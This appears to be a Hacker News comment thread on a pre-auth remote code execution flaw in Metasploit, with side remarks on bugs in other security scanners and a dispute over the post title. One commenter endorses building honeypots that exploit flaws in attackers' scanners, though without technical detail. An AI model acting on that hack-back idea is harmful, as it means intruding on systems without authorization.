This is hardly the first time, Acunetix still has a few vulnerabilities which you can exploit by configuring your website to respond with a specific header to the scan.
SANS' GUI version of SleuthKit was vulnerable to HPP which could lead to persistent XSS/RCE.
Overall it's highly likely that most if not all security testing tools are vulnerable to some attacks, and I have a pretty strong suspicion that governments do work on movie like "counter hacks" by identifying RCE vulnerabilities in common network/port scanners, vulnerability scanners, and other enumeration tools.
I don't know about governments, but I remember netmon for Windows was susceptible to exposing kernel. A coworker had to run netmon for analysis of network traffic for some application, and he forgot to isolate his network. Within a day someone on the corporate network had hacked his Windows computer, crashed netmon, downloaded all his data and destroyed the windows installation and data.
Since I am not familiar with this, I'm very curious to know if something like that is possible and ever been done before? As in counter-hacking a vulnerability scanner by sending a malformed packet back, or something like that.
In this case, this is a bug in the web interface, so you'd have to be on the same network as this person, or have access to their interface for exploiting this to be practical.
I'm more curious to know if anyone has ever been able to 'counter-hack' a scanner by sending an unexpected response back.
That only works on "switch" level mostly, on a modern network you also are likely to trigger on your own switches since they run in a pseudo-promiscious (usually marketed as IP Helper, Broadcast Helper, Broadcast Redirect, DNS Helper etc.) mode to facilitate DNS and other protocols that rely on broadcasts to pass through the switch (or VLAN) boundary.
This is however more in relation to intrusion detection not active countermeasures.
I had a POC honeypot for the acunetix rce bug running never went beyond crashing the scanner but it can work.
You can fuz scanners and the setup honeypots that would exploit any vulnerability you found nothing in here is specifically complicated, you can also tailor your honeypot to specific subset of tools you want to target.
Fun stuff. Serious question though: if you know the cookie signing key, can't you just mint yourself an admin session? Is the YAML vuln required to exploit this issue?
This is a particularly bad editorialized title, since nobody familiar with Metasploit or tools like it would assume it to be secure code.
The right title is the boring one, "Pre-auth Remote Code Execution Vulnerability in Metasploit".
The rule on HN is, if you want to put your own spin on a story, like "This bug will delight irony lovers everywhere", you put that in a comment like everyone else. Submitters don't own the stories and don't get to editorialize their titles.
> The right title is the boring one, "Pre-auth Remote Code Execution Vulnerability in Metasploit".
That title is plenty interesting to me. If I run a product, I would normally not expect it to have security issues (unless it's from Adobe or something really old). Take Wireshark: I've seen them fix stuff like this so, yeah, I do expect Wireshark to be fine to run on untrusted networks as long as I'm not trying to wiretap the NSA's traffic. Similarly with Metasploit, I expect to be able to run that without being sploited myself.
Overall it's highly likely that most if not all security testing tools are vulnerable to some attacks, and I have a pretty strong suspicion that governments do work on movie like "counter hacks" by identifying RCE vulnerabilities in common network/port scanners, vulnerability scanners, and other enumeration tools.